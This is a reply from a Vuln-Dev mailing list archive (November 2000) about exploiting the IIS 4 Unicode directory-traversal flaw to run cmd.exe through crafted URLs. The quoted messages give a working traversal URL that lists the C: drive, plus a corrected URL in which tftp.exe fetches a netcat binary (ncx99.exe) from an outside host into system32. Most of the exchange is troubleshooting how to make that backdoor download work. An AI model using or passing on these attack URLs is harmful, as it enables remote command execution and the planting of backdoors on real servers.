Vulnerability Development mailing list archives
Re: dos commands via iis 4 (TFTP)
From: "Loschiavo, Dave" <DLoschiavo () FRCC CC CA US>
Date: Fri, 10 Nov 2000 11:16:25 -0800
Thanks, looks like I inadvertantly left the "get" out of the message. I was including that in the URL when testing. However, what I did notice was the use of the quotes in the "-i" area of the URL. I was not using quotes. Will have to give that a shot. -thanks -----Original Message----- From: Robert A. Seace To: DLoschiavo () frcc cc ca us Cc: VULN-DEV () SECURITYFOCUS COM Sent: 11/10/00 10:11 AM Subject: Re: dos commands via iis 4 (TFTP) In the profound words of Loschiavo, Dave:
I tried tftp commands in the URL, formatted like this:
http://192/168.1.250/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system 32/c
md.exe?/tftp+-i+192.168.1.20+nc.exe" and got nowhere, while this:
http://192.168.1.250/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system 32/c
md.exe?/c+dir+c: gave me a listing of the of the c: drive. Am I formatting the "TFTP" URL incorrectly?
Yeah, I think so... But, I'm no TFTP guru, either... Personally, I would just use RCP... However, looking at the original advisory on BugTraq, that mentioned using TFTP ("http://www.securityfocus.com/archive/1/141048"), I think you need a "GET" before the "nc.exe", and maybe a destination location specified after it, for where to place it on the NT box... For instance, it shows an URL of: /[bin-dir]/..%c0%af../winnt/system32/tftp.exe+"-i"+xxx.xxx.xxx.xxx+GET+n cx99.exe+c:\winnt\system32\ncx99.exe
Current thread:
- Re: dos commands via iis 4 (TFTP) Loschiavo, Dave (Nov 11)
- Re: dos commands via iis 4 (TFTP) MadHat (Nov 14)
- Re: dos commands via iis 4 (TFTP) dsbelile (Nov 15)
- Re: dos commands via iis 4 (TFTP) Lincoln Yeoh (Nov 15)
- Re: dos commands via iis 4 (TFTP) MadHat (Nov 16)
- Re: dos commands via iis 4 (TFTP) Lincoln Yeoh (Nov 16)
- Re: dos commands via iis 4 (TFTP) Matt Zimmerman (Nov 16)
- Re: dos commands via iis 4 (TFTP) Bluefish (P.Magnusson) (Nov 16)
- Re: dos commands via iis 4 (TFTP) MadHat (Nov 16)
- Re: dos commands via iis 4 (TFTP)-NETBIOS booboo (Nov 16)
- Re: dos commands via iis 4 (TFTP)-NETBIOS MadHat (Nov 16)
- Re: dos commands via iis 4 (TFTP) MadHat (Nov 14)